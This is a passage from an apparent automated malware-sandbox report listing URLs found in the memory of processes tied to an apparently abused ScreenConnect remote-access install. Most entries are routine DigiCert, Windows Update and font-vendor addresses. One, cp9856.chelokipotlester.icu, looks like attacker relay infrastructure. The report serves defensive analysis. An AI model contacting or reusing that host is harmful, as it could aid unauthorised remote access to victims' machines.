chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2361346635.00000212BB9C3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367252644.00000212BEF07000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BF042000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367122651.00000212BEEF5000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: F2E248BEDDBB2D85122423C41028BFD40.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367404303.00000212BEF2F000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367252644.00000212BEF07000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cp9856.chelokipotlester.icu
Source: svchost.exe, 00000004.00000002.2413049971.00000227B8E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com
Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Di
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2361346635.00000212BB9C3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367252644.00000212BEF07000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BF042000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367122651.00000212BEEF5000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.WindowsFileManager.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2361346635.00000212BB9C3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367252644.00000212BEF07000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BF042000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: dfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.14.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: dfsvc.exe, 0000000E.00000002.2366106744.00000212BEE92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabi
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.14.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000004.00000002.2413381367.00000227B8E7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2111953241.00000227B8EE6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2411041899.00000227B8102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2412232845.00000227B8E48000.00000004.00000020.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/go
Source: svchost.exe, 00000004.00000002.2410173948.00000227B78E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0
Source: svchost.exe, 00000004.00000002.2414294076.00000227B8EAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80IO:ID:
Source: edb.log.4.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: 8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B0.14.dr	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rh
Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.14.dr	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2361346635.00000212BB9C3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367252644.00000212BEF07000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BF042000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367404303.00000212BEF2F000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367252644.00000212BEF07000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367122651.00000212BEEF5000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1948935379.000000001B469000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3221000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000013.00000002.2412131785.00000000022AC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000015.00000002.2005207241.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: dfsvc.exe, 0000000E.00000002.2367122651.00000212BEEF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wk3.org/2000/0pldsig#sha1qs
Source: dfsvc.exe, 0000000E.00000002.2366106744.00000212BEE92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wl3.org/2000/0mldsig#sha1o
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: svchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/
Source: support.Client.exe, 0000000D.00000002.1422012645.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2361346635.00000212BB9C3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367252644.00000212BEF07000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BF042000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, chromecache_128.1.dr, ScreenConnect.ClientService.exe0.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A38E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.o
